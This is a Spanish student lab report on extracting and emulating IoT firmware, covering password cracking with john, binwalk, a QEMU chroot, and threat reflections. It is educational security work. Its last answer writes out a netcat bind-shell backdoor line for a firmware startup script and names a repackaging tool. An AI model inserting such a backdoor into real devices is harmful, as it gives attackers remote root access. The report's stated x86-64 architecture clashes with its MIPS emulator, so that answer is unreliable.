Está en la página 1de 8

Práctica

Comprometer el firmware del disposito IoT

Integrantes:

Pablo Emilio Troncoso Romero


Samuel Afitd Cañaveral Uran

Docente:
Alber Oswaldo Montoya Benítez

Universidad de Medellín
Facultad de Ingeniería
Ingeniería de Telecomunicaciones
2023
Parte 1: Realización de actividades de modelado de amenazas para evaluar el
firmware del dispositivo IoT
Paso 1: Configure el entorno y abra una ventana de terminal.

Paso 2: Rompe la contraseña de root usando john.

¿Cuál es la contraseña de root?

 Respuesta: Device

Paso 3: Extraiga el archivo binario de firmware del dispositivo IoT en un nuevo


directorio.

¿Cuál es el tipo de sistema de archivos?

 Respuesta: Squashfs
Paso 4: Examine la salida del comando binwalk.
¿Cuál es el significado de este tipo de sistema de archivos? Realice una búsqueda en la web
para encontrar más información.

 Respuesta: es un sistema de archivos comprimido de solo lectura para


Linux. SquashFS comprime archivos, inodos y directorios, y soporta
tamaños de bloque de hasta 1024 KB para mayor compresión. SquashFS
es también software libre para acceder a sistemas de archivos SquashFS.

Verifique qué nuevo subdirectorio se agregó:

¿Cuál era el nombre del nuevo directorio que se agregó?

 Respuesta: iotdev_firmware.bin.extracted

Cambie a este nuevo directorio:

¿Cuál es el nombre del nuevo directorio dentro de este subdirectorio? ¿Qué comando
usaste para determinar eso?

 Respuesta: Squashfs-root, comando: ls -l

Paso 5: Navegue y explore este sistema de archivos extraído


Verifique el directorio en el que se encuentra y enumere el contenido del directorio:
Muévase al nuevo directorio raíz squashfs:

¿Cuál es la arquitectura de la máquina en la lista?

 Respuesta: Advanced Micro Deivices x86-64


Paso 6: Utilice el virtualizador y emulador de máquina de código abierto QEMU
El binario de QEMU que usaremos debe copiarse en el directorio squash-fs-root. Antes de
copiarlo, necesitamos saber dónde se encuentra:

¿Dónde se encuentra este archivo binario?


 Respuesta: /usr/bin/qemu-mips-static

Copie este archivo en el directorio de trabajo actual, que debería ser squash-fs-root:

Intente ejecutar bin /busybox y otros binarios sin QEMU y observe que no tendrán éxito:

Lo siguiente usa el comando chroot. El comando chroot cambia el directorio raíz al


directorio actual como se identifica con el archivo.

Inicie un nuevo shell dentro del directorio squashfs-root con el siguiente comando:
¿Cómo cambió el aviso?
 Respuesta: Ahora muestra la ruta como '/' seguida de # para el indicador
raíz
¿Cuál es el camino actual?

 Al usar el comando para obtener el directorio de trabajo actual no se


muestra la ubicación, como si se estuviera en un entorno diferente.

Mire otros programas/binarios en los directorios bin y sbin. Intente ejecutar al menos otros
3 programas y documente sus resultados. Escriba 'salir' cuando haya completado la
exploración para salir del caparazón.

 Dentro de Shell no se pueden ejecutar todas las sentencias con los


programas que se encuentran en los directorios bin y sbin. El shell permite
ejecutar un conjunto de comandos y configuraciones de usuario desde un
archivo llamado script de shell, que normalmente tiene una extensión de
archivo .sh
 Si un comando no funciona lo más probable es que no sea un script, sino
algún otro archivo ejecutable, por lo que falla.

Paso 7: explore y observe otros archivos importantes en este sistema de archivos


descompilado/extraído
Verifique que actualmente se encuentra dentro del directorio raíz de squashfs:
Parte 2: Reflexión y discusión sobre las amenazas al firmware de dispositivos
IoT
1. ¿A qué tipo de amenazas o vulnerabilidades es susceptible el firmware del
dispositivo IoT?
 Ataques de denegación de servicio (DOS/DDOS)
 Ransomware o secuestro de dispositivos
 Bots de spam
 Ataques de procesadores de canal lateral Spectre y Meltdown
 Alteración de firmware
 El fallo buffer overflow
 Claves de cifrado
 Hashes de contraseña

2. Describa un tipo de ataque de firmware de dispositivo IoT y qué medidas se podrían


usar para ayudar a prevenir este tipo de ataque.

 La cantidad de ataques de denegación de servicio distribuido o DDoS se ha


disparado significativamente. El objetivo es llegar a un solo servidor a través
de múltiples dispositivos. Los piratas informáticos utilizan malware de
botnet para intentar un ataque DDoS a través de dispositivos IoT infectados
o "zombificados".
 La mejor práctica estándar actual para protegerse contra ataques IoT DDoS
amplificados implica tener dos líneas de defensa: un sistema local inicial
con capacidades de detección y filtrado automatizados, y un sistema de
nube de equilibrio de carga secundario que puede activarse durante un
gran ataque para absorber y redirigir el exceso de tráfico a preservar la
experiencia del usuario.

3. Describa otro tipo de ataque de firmware de dispositivos IoT y qué medidas se


podrían usar para ayudar a prevenir este tipo de ataque.

 La mayoría de las personas se olvidan de cambiar el nombre del enrutador y


se apegan al nombre dado por el fabricante. Esto podría obstaculizar la
seguridad de su Wi-Fi privado. Dé cualquier nombre que no esté asociado
con usted. Para proteger sus dispositivos IoT, la red y Wi-Fi son la primera
defensa contra los piratas informáticos porque muchos dispositivos IoT
están conectados a Wi-Fi. Asegúrese de cambiar la configuración
predeterminada de privacidad y seguridad.
 Se podría añadir una puerta trasera a un script existente dentro del firmware
del dispositivo. Se colocá allí para permitir que el fabricante acceda a dicho
hardware y potencialmente permite que una atacante abra de forma
remota un shell con privilegios de raíz en el dispositivo de destino.
 Los piratas informáticos pueden explotar las claves de cifrado para espiar la
comunicación, obtener acceso al dispositivo o incluso crear dispositivos no
autorizados que pueden realizar actos maliciosos.
 Los desbordamientos de búfer pueden permitir que los piratas informáticos
accedan de forma remota a los dispositivos y pueden armarse para crear
ataques de denegación de servicio y de inyección de código.

4. ¿Cuál es el nombre del programa que los piratas informáticos podrían usar para
modificar el firmware con una puerta trasera y volver a empaquetarlo en otro
binario de firmware? ¿Existe este programa en el sistema operativo Kali Linux que
está utilizando?

 Firmware Mod Kit es una herramienta escrita por Jeremy Collake y Craig
Heffner. Usando FMK, como se le llama popularmente, puede extraer una
imagen de firmware, agregar su propio código y crear una nueva versión del
firmware.
 Para agregar la puerta trasera, podemos agregar la siguiente línea en
cualquiera de los archivos .sh, que se puede activar automáticamente al
iniciar el dispositivo.
/bin/busybox nc –nlp 12345 –e /bin/busybox sh &

También podría gustarte